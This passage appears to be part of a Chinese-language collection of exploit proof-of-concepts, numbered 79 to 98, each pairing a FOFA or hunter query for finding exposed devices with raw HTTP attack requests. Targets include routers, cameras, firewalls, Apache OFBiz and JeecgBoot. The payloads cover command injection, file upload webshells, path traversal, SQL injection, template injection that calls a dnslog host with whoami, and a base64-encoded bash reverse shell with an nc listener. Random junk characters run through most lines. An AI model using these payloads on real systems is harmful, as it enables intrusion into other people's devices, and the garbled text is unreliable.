C" o8 D9 U. |, W' TContent-Disposition: form-data; name="target"7 f: C6 o6 w$ R+ L' F; e: B
3 Z1 ?; U: ~3 {' D8 [( `9 r/Applications/SkillDevelopAndEHS/
$ S& b/ H, n8 k# p) x- n% V5 z------YsOxWxSvj1KyZow1PTsh98fdu6l--
5 Q% _1 M" i( }+ S5 J% V! \7 C" z
# s+ U4 D \) N# wGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
% z& c% J( S7 nHost: x.x.x.x' n/ o8 p% G4 x; T! x
A1 O) Z9 V8 z4 I$ O
9 @, N; _0 g; {) w( e- r79. BYTEVALUE 百为流控路由器远程命令执行
# }% i) E9 E6 f$ iFOFA:BYTEVALUE 智能流控路由器8 ?! T9 z) H0 y$ ~1 P8 _
GET /goform/webRead/open/?path=|id HTTP/1.1
4 S$ l3 Y# V6 f* AHost:IP
9 v3 ?, }2 z3 h* g" H6 g8 A9 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
, l5 R5 y; H: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, c) g5 a" d- a; q* n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 U/ Y( e3 H. I: G3 [Accept-Encoding: gzip, deflate/ [) ~+ s8 ^% I ], ?$ d; V3 \
Connection: close
# P* u' L8 d. s9 U$ b% \Upgrade-Insecure-Requests: 1
/ f1 q+ d+ ]$ D3 E3 n7 q5 \ K. @0 I
$ w& Z. L) O( |" G80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传+ o3 f3 L y* r/ h( m
FOFA:app="速达软件-公司产品"
0 ]6 L4 a8 D1 Q+ L3 vPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.19 \/ {$ b, `( U( B6 h/ k( S" X
Host: x.x.x.x
/ u( D1 s, |/ }# ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# H H) f, o6 T4 m% [
Content-Length: 270 @& y2 I) ^5 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( Z) F5 l4 d' M: @- d4 F5 u% rAccept-Encoding: gzip, deflate
# _9 [$ E% V& U! TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; D' e- V$ l7 j0 S# i# R3 rConnection: close
) I, o4 B9 {: x: r% E+ X' lContent-Type: application/octet-stream
, V8 ~1 r0 S/ tUpgrade-Insecure-Requests: 1% b3 I' D! S- k6 _9 ^7 w
2 }7 P" u8 Y$ }) c2 C5 q# A5 i<% out.print("oessqeonylzaf");%>2 e: i4 A8 ^1 H/ M7 \
: k; r* w$ i2 o. u- n5 Q* b" z4 c# [/ L: g% B4 X
GET /xykqmfxpoas.jsp HTTP/1.1% F+ g) P9 n/ X( B* q2 |
Host: x.x.x.x
- H0 ?3 N/ F# p; \! t+ ^1 k$ TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 x& f# U9 v1 \ y/ e6 RConnection: close! U; u! E9 A" [2 d7 [4 V" d
Accept-Encoding: gzip& I* t* D y# X& b1 O
+ ]$ Z% N) ?- s4 O% [
+ y8 |, A l# n9 m81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
) q) _0 e6 P3 u: rFOFA:app="uniview-视频监控", k# [, A, [5 Z3 [4 g2 L, Y- S
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
+ ^, _1 u+ ?( I% C, F* D5 y# Y$ HHost: x.x.x.x6 ]2 Q X1 Z$ F, ?+ w1 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) w! y* |/ R( |# B% RConnection: close
: y5 F1 D" Z4 d [9 N* K1 Y( JAccept-Encoding: gzip
7 L/ i6 e1 K9 ^$ [! d# S* X6 j3 \* R3 Z+ s! Q& r
1 B! e/ u/ }0 ?' a: i$ z9 a+ j' \
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 q& G8 U, _, w4 h& h# BFOFA:app="思福迪-LOGBASE"0 n; i9 A" h; k: X. `" L
POST /bhost/test_qrcode_b HTTP/1.1
" F& `! N3 }2 P- v/ ^! HHost: BaseURL
2 o1 z7 a, i: Y0 [9 |2 WUser-Agent: Go-http-client/1.10 J5 p$ p9 c& u/ @' z7 h
Content-Length: 236 X! L+ w9 P0 |, V
Accept-Encoding: gzip" d# ?% e& Z$ p: O
Connection: close
( c8 F8 Q* s$ ^' ~* P, |' h3 wContent-Type: application/x-www-form-urlencoded
$ l& N! [7 b' P0 T% a: IReferer: BaseURL$ K* G( I2 |! I4 B. X/ \$ `
, Z/ W6 U/ q. @: L2 M+ wz1=1&z2="|id;"&z3=bhost# Z" a$ }4 {0 X+ Q0 o3 z
1 I" w1 Y/ A4 F8 A: B0 V0 i8 S
83. JeecgBoot testConnection 远程命令执行
f! X6 j, N5 H' A+ r( d7 C5 b% `FOFA:title=="JeecgBoot 企业级低代码平台"5 W. L- w: j; M2 a o; r u
* y% z& k; a, N5 ]; c1 B# R( k* U A
% @3 H& g! R* }
POST /jmreport/testConnection HTTP/1.1
o a S8 g7 I8 K5 j5 AHost: x.x.x.x& y) V- C0 J) @* ~5 w0 D) L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ x O; S; `: X2 u. ~4 j0 {$ S# z# lConnection: close$ q; ?/ c' p! T% Q8 i* {' g2 g7 v6 B0 P4 L
Content-Length: 8881
6 p$ R! k# o9 t& tAccept-Encoding: gzip
8 F3 G4 g9 l- o8 ~Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"! Y0 T1 g3 Y9 d, O9 i, L8 |
Content-Type: application/json0 v( E- b* D2 T. k7 f% l Z
/ \8 r4 q: {; S7 X+ Y% C: g/ g7 WPAYLOAD* @" {, U5 v- v' V" ]: Y! R
m! J7 A! R+ k; O3 D1 I" z84. Jeecg-Boot JimuReport queryFieldBySql 模板注入0 Q @% B) F0 m/ K4 k' s7 ^- Y
FOFA:title=="JeecgBoot 企业级低代码平台". ^& ^) `6 A5 J h) Z
9 I7 D$ t' V. c, p9 M
7 Z$ P# R7 y/ Y! O0 y. t9 H2 G0 F _& C/ v- ~
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1% O( `1 W. e, E2 ]- J/ Q- G2 q* A
Host: 192.168.40.130:8080. i: H7 n% w- ?% M; h/ j: @
User-Agent: curl/7.88.1
# X* p8 |' r* MContent-Length: 156
/ E! f+ S9 v3 {3 a/ ]+ x& YAccept: */*
. Y2 T0 F. w7 U) Q# S9 xConnection: close
. s4 u" T) `# Z3 l5 a$ cContent-Type: application/json" v& T' ~# _6 {7 u9 r
Accept-Encoding: gzip
. y8 Q" j/ n; A1 }0 B) x4 c8 T0 ^# J0 l% L- y4 k9 ~; O
{
! x5 Y0 l: Q, S& C( c0 m' H "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
/ O6 m6 p! P4 n ~4 ~' ] "type": "0"
1 h# X* k( ?; Z6 }}+ f2 v& _( S( v. f
$ t) c* z' q, h9 f1 j3 ^
7 t, R% b& D0 d& j85. SysAid On-premise< 23.3.36远程代码执行
& [' X/ e9 p# ~2 Y/ I4 I4 NCVE-2023-47246
' H7 Z0 L; o& O* FFOFA:body="sysaid-logo-dark-green.png" ' ?- E! y* r/ \) ~8 i$ {
EXP数据包如下,注入哥斯拉马% B8 Y" r2 b( c; B$ i
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
8 Q( `* Y8 o7 V3 j6 OHost: x.x.x.x' p( Z2 \$ Z1 s8 i! [1 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 E* I/ T0 S) y4 \Content-Type: application/octet-stream
, \1 X8 _/ n) M7 sAccept-Encoding: gzip
; Z, x8 Q) C& e# E& j7 l0 B$ {) O [
PAYLOAD
3 m! A, h' e' f, n6 E, R$ A4 }! Y+ `- x. q+ j
回显URL:http://x.x.x.x/userfiles/index.jsp
2 _( J* M3 F/ R @
% E+ R9 |/ M7 p, B- K86. 日本tosei自助洗衣机RCE& v% j% B7 B% ]3 i' H6 F6 D
FOFA:body="tosei_login_check.php"
7 o" K. T" r# M, x7 r2 x- {POST /cgi-bin/network_test.php HTTP/1.1; n/ a. b) t- ^6 i1 v* t
Host: x.x.x.x2 ~% ?6 H y7 J8 W* p. N
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36+ P# i5 I) R7 Z$ Z2 M8 g8 s
Connection: close
/ z3 x! c1 N. f0 R6 A* [" F' @+ nContent-Length: 44
' C9 A @" ]9 n( C4 m9 A7 gAccept: */*: ]& q, p) l5 a5 m$ U1 D4 B
Accept-Encoding: gzip
" \1 u6 M9 ? sAccept-Language: en, D0 K7 ^4 j+ e! p
Content-Type: application/x-www-form-urlencoded* X! S5 z- b( f8 D8 M/ d
Y6 k) a+ \! \: Y) ihost=%0acat${IFS}/etc/passwd%0a&command=ping4 R8 U7 o% e9 F, v3 R+ @
0 u4 u4 Q% _2 \* A5 L" Z7 F" n; F
3 S. b4 D( R/ j
87. 安恒明御安全网关aaa_local_web_preview文件上传$ o9 R) w5 a/ g: s& e# C
FOFA:title="明御安全网关") p) p& F" k' s
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.15 A; a6 Y. s2 u7 p8 u
Host: X.X.X.X
8 _% r6 q: S) t! CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! {& c8 [% D9 a
Connection: close
: O: {9 y: o3 N! q7 z$ n- }Content-Length: 198/ G$ x7 k# g- w" B, T+ H: B" D
Accept-Encoding: gzip- j9 Q& o; Z5 _
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd L$ M: J% K. f0 k
2 e& G- C0 Z# R
--qqobiandqgawlxodfiisporjwravxtvd
2 a: k; h- v8 I. H, |* tContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
) c7 O( p% q5 ^, z8 z3 RContent-Type: text/plain
* {8 X# q, h+ K1 W `0 A! D3 ^2 R& S# s
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
. g( T+ Q/ Y. [3 h--qqobiandqgawlxodfiisporjwravxtvd--
1 g0 ]9 b2 ~6 N, a( B h
* R) m$ P; W, Q2 l8 n+ p* t8 I4 Q
/jfhatuwe.php9 V m3 S* X4 ~# _3 [3 K0 K
9 U- `. I3 G! g1 } m) a88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
# \, C% P% e7 w' d& R$ IFOFA:title="明御安全网关"
; m5 D2 E- o1 T: d! g% wGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1( B4 i- g; ^0 [2 f; K. R* Z
Host: x.x.x.xx.x.x.x% z. y4 b+ k' @2 [0 U9 h- C3 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 C$ h: W/ C+ W( E9 t! V0 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' r+ W/ k" d+ A }" ]( Y9 Y, VAccept-Encoding: gzip, deflate, b% x- ^5 x2 a& `2 l O# ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 Y, i( M9 J. h9 M# A8 y" c. hConnection: close
5 s2 B! b% f Y$ O. @& x+ e1 s% ~, x9 t7 Q7 N. q
& R3 f c9 V5 G# d/ Q0 b. q9 `/astdfkhl.php4 ^/ ^; b* i: R: h% ~! m( E
+ S! U. S' a& @
89. 致远互联FE协作办公平台editflow_manager存在sql注入4 U; }3 n( Q3 Y% q
FOFA:title="FE协作办公平台" || body="li_plugins_download"
: H+ A, J' T8 u% c! S) a3 X# ~$ FPOST /sysform/003/editflow_manager.js%70 HTTP/1.1' m# s9 n% i; }, T
Host: x.x.x.x
- @, W3 b, I- x& l( MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 \* b( j6 ?& r. Q$ \7 O( w1 aConnection: close
0 Z; T9 Y" t! _8 ] ^Content-Length: 41
) s, j/ I$ \" [, g& LContent-Type: application/x-www-form-urlencoded# y4 K( x) J/ O0 Q& B
Accept-Encoding: gzip
* Y; Z! R9 y% J" X/ v6 ^2 Z) Z! ^$ H) B
" N0 G/ f+ q" d; ioption=2&GUID=-1'+union+select+111*222--+/ w! S6 l" M4 O
/ z! Z) l# s* l b
4 T5 t8 ~- ^% }" Z% w7 |90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
3 n0 @) v) T( v; ~2 O: j3 i4 [FOFA:icon_hash="-1830859634"/ p4 M% }2 |% K) @( ^
POST /php/ping.php HTTP/1.14 b; g7 S' ^8 J0 \0 V9 H" y
Host: x.x.x.x
2 U; e5 X) ~) B! X4 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" V; K) T3 O& C% R( C
Content-Length: 51
# j: F: Z* U& ]; Y& L# J g5 eAccept: application/json, text/javascript, */*; q=0.01. Y# d- b2 K: |# m% s- |
Accept-Encoding: gzip, deflate# C3 _+ D& g2 c8 F4 ]0 w, h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 K# A! L8 V+ k, \" h% ^4 tConnection: close
# E. `4 Y" \' B, EContent-Type: application/x-www-form-urlencoded
8 N# V1 \+ O/ r7 U3 s0 q, bX-Requested-With: XMLHttpRequest
% ^, E" ~" j, w$ ~3 ^* F
9 ?6 c+ y# y' y1 y5 |: l& Njsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
1 i3 v: H* Y7 G6 }" z; ?/ Q* m; j1 V
/ h$ D& I, y/ |5 N91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取1 ?, D1 @( y$ q
FOFA:title="综合安防管理平台"- }1 B0 i9 {7 f& E v
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
- `" c5 f" j7 NHost: your-ip& A$ L/ r2 X5 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% h. r7 D$ T4 y+ |* sAccept-Encoding: gzip, deflate4 K- L$ f; {8 |$ o% W. B
Accept: */*
3 _) q6 E$ P" S. J/ _Connection: keep-alive
0 a1 N+ m$ D; U$ u1 y; {$ ?& O0 x& E: l) [1 n3 i& t
4 G4 O. z+ v0 E: i, P" i r3 `$ [7 S1 E
92. 海康威视运行管理中心session命令执行
: k; F! J4 U T( w0 h& c/ BFastjson命令执行8 {8 h! I1 u; A2 b" B5 L
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
0 v* Q: E1 \0 ]7 _+ WPOST /center/api/session HTTP/1.1$ l' E: ~, U4 @6 P4 U o
Host:
( L6 y) U: H% tAccept: application/json, text/plain, */*
1 Y0 N# X! E2 Z: f" v& `" MAccept-Encoding: gzip, deflate
3 ?% H# T7 x" p# L; HX-Requested-With: XMLHttpRequest, C( F8 T# j+ E, m
Content-Type: application/json;charset=UTF-8
K Z7 k( f. x' R- sX-Language-Type: zh_CN- \3 X+ Q( i4 P8 h1 S9 U
Testcmd: echo test
" a; S6 X8 \6 d0 s. QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36/ K6 Z: z) a% M/ B- ?. U. J7 A w. C# O
Accept-Language: zh-CN,zh;q=0.9- H$ l9 [* `. J5 a0 E
Content-Length: 5778
/ u4 c2 t8 K) Q w/ I0 C4 ?7 {8 A5 i
PAYLOAD% d2 S5 s* j# Z3 a6 T8 t
! \+ I1 q! [( Y7 ]
; Y; w8 r( H: E0 X6 ?. i" @3 z# O93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传3 @& x; \5 j. A* L8 M
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% b( s/ a% q; C4 s
POST /?g=app_av_import_save HTTP/1.1( Z1 d9 L% `$ y/ ~( [, O2 i# C
Host: x.x.x.x
" Z; _# M! @$ G& C; A3 N$ @% RContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
( s3 i! P0 v$ yUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( B S5 e8 Y& U4 ~$ Q
0 `" @4 ^, F/ n) R( U------WebKitFormBoundarykcbkgdfx
' S, N) A8 J! J" K, }1 o& t) EContent-Disposition: form-data; name="MAX_FILE_SIZE"
! m7 l+ ~, u# A) o, n! X0 {, [
2 t2 X3 p4 H6 W+ R% n10000000
: B; C* I& w" X9 l- V! s: O6 N------WebKitFormBoundarykcbkgdfx
3 Q6 e% V. M$ lContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"- |0 l% `% ^( h, p( S6 H1 [
Content-Type: text/plain
5 p- ^8 X; H1 U1 {' W1 |' N
+ }. D& a6 |& Y9 f4 f- ewagletqrkwrddkthtulxsqrphulnknxa
8 ~3 v g: d9 l) [* P0 {------WebKitFormBoundarykcbkgdfx; j' b% T) B4 n: r
Content-Disposition: form-data; name="submit_post"- r" T, Z5 A3 s4 B
1 @. j5 u7 q V t% L; m+ jobj_app_upfile
% y/ Y- [' R% k K: c------WebKitFormBoundarykcbkgdfx {9 d# t7 z8 s0 w/ i& a
Content-Disposition: form-data; name="__hash__"
. F0 x7 l, X6 k
8 D$ u( P( d4 f% S0b9d6b1ab7479ab69d9f71b05e0e9445% P+ r2 i5 U0 h4 O
------WebKitFormBoundarykcbkgdfx--
4 o/ |$ H6 [7 a& }/ c& t$ x7 s$ x# E8 S: e! ]
4 a4 X0 {6 {$ x2 f G3 y
GET /attachements/xlskxknxa.txt HTTP/1.1* \1 ~2 U% ?0 ~- K9 Q
Host: xx.xx.xx.xx
- t3 F) e+ j" I6 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" e1 Y0 B1 H/ L' m+ }, l% R/ S# S( k1 z# Z4 k( l! o
j$ H3 M7 t1 s
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
8 O, _, E7 f* Q. iFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
5 L ~7 h( n( q) g) jPOST /?g=obj_area_import_save HTTP/1.1# j: p, K9 r) P* C( @. b1 h% }# e
Host: x.x.x.x
+ k6 A+ f1 s, }9 vContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
1 K( _9 U2 u( }' S0 R1 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 ?0 I+ r: c5 [# s( g9 X9 l5 Q, A7 L- h4 H) d, E
------WebKitFormBoundarybqvzqvmt
! Z0 F, [; a) ^0 a9 Q% b4 j5 bContent-Disposition: form-data; name="MAX_FILE_SIZE"* W0 c5 }$ G9 q5 |8 y
0 E2 ~; K* O d1 }3 U( j% A4 w
10000000
3 d" G- t l+ V7 ^2 Y------WebKitFormBoundarybqvzqvmt! V0 n/ B, }) B/ f4 Z; h8 T
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
) R3 J, L$ G8 G9 A. qContent-Type: text/plain' t3 i. J5 k8 w4 D; b& i
9 X3 X- h( d; u
pxplitttsrjnyoafavcajwkvhxindhmu. M4 z$ O- R, O& {
------WebKitFormBoundarybqvzqvmt4 y9 n6 w0 i7 y& Z$ n0 Z% O% [
Content-Disposition: form-data; name="submit_post"7 R$ [. D5 h' p' T' a& i [! a; ^
8 P9 i) ?" f& b% v* U& k
obj_app_upfile
% p) f1 N7 f! Y; Y' @2 Y! S------WebKitFormBoundarybqvzqvmt
! ?0 m/ L4 d7 d+ F3 f- a/ h5 b' L$ b$ BContent-Disposition: form-data; name="__hash__"" X( M' v' z# w, b) H+ Q0 [
6 A6 ]& K" F0 b% f7 w0b9d6b1ab7479ab69d9f71b05e0e9445
& \& Q2 M6 {& _% |1 S$ ]------WebKitFormBoundarybqvzqvmt--
. a. Z/ t$ c5 d7 R4 P% l; {2 D" C4 X/ s& h7 o& T6 P' \ T
$ a$ k$ O" i; r N3 N! o
3 k1 @" ~, U6 NGET /attachements/xlskxknxa.txt HTTP/1.1
t6 K! r- V1 \) S& Q2 u# f0 ZHost: xx.xx.xx.xx
$ P4 I0 [/ `! P2 O+ A UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# o: s& _& s2 \/ s# `
" |/ \+ H4 }0 p( a9 \+ Y
) i; v2 \* C! V. g# H v; ]& e$ ?& X! L/ y) a
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行& H6 R/ g8 j2 t! b0 }2 c
CVE-2023-49070, x2 o; P, V* G1 p5 c' W
FOFA:app="Apache_OFBiz"; B8 @) o7 V' X" s8 ^% [1 Q7 t9 B( W
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+ E7 o9 H" \1 S' }) ~Host: x.x.x.x
8 T* N; P7 P V* ]! F1 H, ^; Z. WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 U" W$ A2 m+ a# ~
Connection: close
& Z* B) w& I% [" fContent-Length: 8894 W, d9 Y; n) X
Content-Type: application/xml$ ~! t' p/ o3 Q2 u0 G3 F( I" n5 @9 Q
Accept-Encoding: gzip
/ O6 r) C1 E) |3 E n& q2 B; r& |: i! [2 W( A' S u1 R
<?xml version="1.0"?>
1 f# i7 E1 Q8 V) Q* Q) `3 E<methodCall>
% I4 S$ ^. A: A1 D; H <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>7 O0 c; @: k) Y
<params>
( n1 f1 ^4 e9 G& z( H& J0 \ <param>
; q. N6 h, ?* _- N, p; { <value>
/ E, l7 m0 Q/ ~' a' Q5 C: [. R <struct>' t" j0 {* V3 L, M3 o7 K
<member>
2 W8 w; ^' Z. C( T9 K. A% M9 G <name>test</name>
8 X% H: v+ q+ p2 O <value>
" Q) t4 Q3 T( Q <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>6 H; R2 N4 g: F! F
</value>, \! T! j5 h4 d8 r6 z, {( W
</member>
4 A k, |' Z2 y0 f; g* M$ Q k </struct>+ z W4 n6 a4 f r3 E+ z
</value>$ f# w6 w5 Y& @
</param>
: p( y6 C5 ?0 g1 H# Z( b </params>
3 r( \/ G* W4 A% F$ T</methodCall>/ O6 q( I. q( C# P: U9 L" G
# _ ]* O5 O# G, q2 M6 J. S
4 l) r: W: c& w+ a1 p/ s用ysoserial生成payload
& l. u) [+ v4 v5 t' R& J, b/ kjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n", c. J% B% {& M1 d2 k+ p
% D6 ^- J- I0 F3 O$ G$ @
( j6 ]9 R3 W7 W8 B) ]8 D5 d6 C将生成的payload替换到上面的POC& }0 Y1 K/ B7 c" f. H1 ^
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 U3 c* L& b3 G* O
Host: 192.168.40.130:8443; h- Z- z/ b* W. ?# n* _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 q/ r4 ?4 {3 q( i% f f
Connection: close
9 F1 a. Y; A; V6 I, M9 W1 Z) S' \Content-Length: 889
3 C/ j+ e3 w+ P) y; ?& u1 W/ mContent-Type: application/xml% O0 }3 E2 v5 c
Accept-Encoding: gzip7 b9 |+ h- `6 d5 {
3 G u F9 C8 p3 l4 L$ m
PAYLOAD; I6 I% E2 ^9 O4 h5 i
" @5 d# n8 e/ l( F7 g! ^! N9 d96. Apache OFBiz 18.12.11 groovy 远程代码执行2 m( {& c( s! G: ?; [1 G
FOFA:app="Apache_OFBiz"
; h: [0 g* l8 b5 a# c8 `" K2 IPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+ }0 ~9 I& B$ T* gHost: localhost:8443
" T( l- z. }: T, |0 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 C9 ~, S6 O) ]: @Accept: */*5 Z! \- y+ ]5 K0 y& S4 R, }% I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 c) V- S' h0 `+ k8 BContent-Type: application/x-www-form-urlencoded+ ~6 o8 H3 a' G+ _
Content-Length: 55
8 a, i4 |- m- G% k$ F
Q! \2 l* M# }9 y1 s8 ~groovyProgram=throw+new+Exception('id'.execute().text);7 @, Q) M' L4 `: ~. U
; @1 o# D/ N* X& C
0 u0 {# H$ z6 Y; i* h反弹shell/ F/ R _6 u! t3 H, k- d
在kali上启动一个监听
$ ? f3 h N; Z4 ~4 o# I8 Z/ Nnc -lvp 77772 b# C. M! h4 t3 c9 f
% L( L" U5 D1 u: S9 h3 p5 F) q4 c
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 f" n6 [. Q( G; |7 X6 l6 o
Host: 192.168.40.130:8443) @6 Q- r( s2 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& Y( F$ E, ?+ O, [0 u5 Y) o2 G
Accept: */*: ?- L& m3 S; _2 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 d0 }% G5 k& [( }
Content-Type: application/x-www-form-urlencoded
! y1 M% |1 _+ f; v8 @4 W/ RContent-Length: 710 n; I& r1 |7 H2 m4 S
) ^; E& C; S# v+ n) l! VgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();3 v! N4 r% Y+ b; x& d
) ~7 N7 R. c' l1 m9 H2 y
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
' B" E: H: b/ g+ gFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"; w, `! U `1 x+ G1 J
GET /passport/login/ HTTP/1.1
, f2 ]8 m$ o- C# c5 i; h8 c' tHost: 192.168.40.130:8085; Z$ h/ E8 S l2 V! a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( y( M; ?( [1 s$ m) S
Accept-Encoding: gzip% L8 K. F! O+ a" g; \- k7 g
Connection: close5 ^7 J& n& d% ~: u
Cookie: rememberMe=PAYLOAD
9 Y: Y6 i: M- E% @9 ]/ J+ G9 IX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"" Z* h' s) Y; K8 P: A
3 e- b( H, k, ]3 I A
& V! X8 C- R4 P1 X5 ]6 W
98. SpiderFlow爬虫平台远程命令执行
; M% L9 H3 V, n& x* FCVE-2024-01957 d. ~% q# j/ f' I4 ^
FOFA:app="SpiderFlow"' D# x6 t- e$ L1 l
POST /function/save HTTP/1.1
1 t- X* z; i9 @% o6 pHost: 192.168.40.130:8088; z1 Q- l7 g4 D h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ p: U" @3 X" o7 R. x+ t
Connection: close% L% g, o& R X U5 s0 T0 K0 k
Content-Length: 121! s( _" e! {* `' |
Accept: */*
